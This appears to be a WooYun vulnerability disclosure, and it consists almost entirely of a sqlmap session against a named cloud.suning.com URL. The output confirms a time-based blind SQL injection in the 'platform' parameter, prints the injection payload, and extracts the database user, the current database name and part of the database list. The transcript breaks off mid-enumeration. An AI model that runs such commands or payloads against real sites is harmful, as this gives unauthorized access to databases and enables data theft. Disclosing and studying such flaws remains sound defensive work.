WooYun.org

[root@Hacker~]# Sqlmap -u "http://cloud.suning.com/cloud-web/versionUpdateByType
.htm?platform=IOS_HD" --dbs --current-user --current-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:10:17
[10:10:17] [INFO] resuming back-end DBMS 'mysql'
[10:10:17] [INFO] testing connection to the target url
[10:10:17] [INFO] heuristics detected web page charset 'ascii'
[10:10:17] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: platform
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: platform=IOS_HD%' AND SLEEP(5) AND '%'='
---
[10:10:17] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.11
[10:10:17] [INFO] fetching current user
[10:10:17] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[10:10:43] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[10:11:33] [INFO] adjusting time delay to 1 second due to good response times
snscuser@%
current user:    'snscuser@%'
[10:14:36] [INFO] fetching current database
[10:14:36] [INFO] retrieved: pan
current database:    'pan'
[10:15:43] [INFO] fetching database names
[10:15:43] [INFO] fetching number of databases
[10:15:43] [INFO] retrieved: 8
[10:15:58] [INFO] retrieved: information_sch
[10:21:32] [ERROR] invalid character detected. retrying..
[10:21:32] [WARNING] increasing time delay to 2 seconds
ema
[10:23:03] [INFO] retrieved: NOTES
[10:25:55] [INFO] retrieved: SAFE
[10:27:27] [INFO] retrieved: SY
[10:29:09] [ERROR] invalid character detected. retrying..
[10:29:09] [WARNING] increasing time delay to 3 seconds
[10:29:40] [ERROR] invalid character detected. retrying..
[10:29:40] [WARNING] increasing time delay to 4 seconds
[10:30:21] [ERROR] invalid character detected. retrying..
[10:30:21] [WARNING] increasing time delay to 5 seconds
NC
[10:32:52] [INFO] retrieved: mys